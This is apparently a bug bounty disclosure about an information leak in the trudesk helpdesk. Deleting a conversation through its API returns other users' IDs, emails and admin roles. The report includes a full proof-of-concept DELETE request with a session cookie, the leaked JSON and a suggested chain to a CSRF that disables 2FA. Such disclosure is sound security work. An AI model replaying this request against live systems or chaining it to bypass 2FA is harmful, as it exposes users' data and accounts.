Exposure of Sensitive Information to an Unauthorized Actor in polonel/trudesk
Reported on
Dec 31st 2021
Description
When you delete a conversation, the server responds with sensitive data including user IDs and emails among other data. The endpoint that's contacted in order to delete a conversation is /api/v1/messages/conversation/<conversation ID>.
A user with low level privileges (such as a customer account) could delete a conversation with an admin or support user in order to gather sensitive data on them (such as their email and user ID).
Proof of Concept
Request to delete a conversation:
DELETE /api/v1/messages/conversation/61cbd4e1ce4a7b08a27da13d HTTP/1.1
Host: docker.trudesk.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Origin: https://docker.trudesk.io
DNT: 1
Connection: keep-alive
Referer: https://docker.trudesk.io/messages/61cbd4e1ce4a7b08a27da13d
Cookie: connect.sid=s%3A31gkqni9Vf8BD36ANQ7gKXaqrXC7kB5o.%2Fxp0Y6uSTTPs0mRElGQX7DgfBvjTgY8TLaQKI5VbsoM; $trudesk%3Atimezone=America/New_York; io=XohJgk5RuPIxqanVAAzL
Sec-GPC: 1
After a conversation is deleted, the server responds with this data:
{
"success": true,
"conversation": {
"participants": [
{
"_id": "61c8238fce4a7b08a27da00d",
"username": "customer.demo",
"email": "turnonit@gmail.com",
"fullname": "Client",
"title": "Client",
"role": {
"_id": "5c860277e518a8003458fae7",
"name": "User",
"description": "Default role for users",
"normalized": "user",
"isAdmin": false,
"isAgent": false,
"id": "5c860277e518a8003458fae7"
},
"lastOnline": "2021-12-26T08:12:37.037Z"
},
{
"_id": "5ba4104e5b2b5a00605e95a2",
"username": "demo.user",
"fullname": "Demo User",
"email": "demo.admin@trudesk.io",
"role": {
"_id": "5c860277e518a8003458fae9",
"name": "Admin",
"description": "Default role for admins",
"normalized": "admin",
"isAdmin": true,
"isAgent": true,
"id": "5c860277e518a8003458fae9"
},
"title": "Demo Admin",
"lastOnline": "2021-12-26T08:02:59.342Z"
}
],
"_id": "61c823ebce4a7b08a27da00e",
"userMeta": [
{
"userId": "61c8238fce4a7b08a27da00d",
"joinedAt": "2021-12-26T08:12:27.015Z",
"createdAt": "2021-12-26T08:12:27.022Z",
"updatedAt": "2021-12-26T08:12:55.266Z",
"deletedAt": "2021-12-26T08:12:55.264Z"
},
{
"userId": "5ba4104e5b2b5a00605e95a2",
"joinedAt": "2021-12-26T08:12:27.015Z",
"lastRead": "2021-12-26T08:12:27.015Z",
"createdAt": "2021-12-26T08:12:27.022Z",
"updatedAt": "2021-12-26T08:12:27.022Z"
}
],
"updatedAt": "2021-12-26T08:12:44.650Z",
"createdAt": "2021-12-26T08:12:27.018Z",
"__v": 0
}
}
Impact
Since this leaks sensitive information, an attacker can use this information in another attack. For example, since it leaks the user ID, the attacker can take this piece of data and perform a CSRF attack in order to disable the victim's 2FA code (a CSRF vulnerability which i pointed out here: https://huntr.dev/bounties/edit/af3ecce4-840f-445e-98d0-11557cd8de1f/)
Occurrences
messages.js L311
After a conversation is successfully deleted, the sConvo variable is returned which contains all the metadata of the conversation which includes sensitive data (such as user IDs). This metadata should be stripped prior to it being returned to the user when they delete a conversation in order to prevent information leakage.
This has been fixed in v1.2.2. I will update this report once it is released.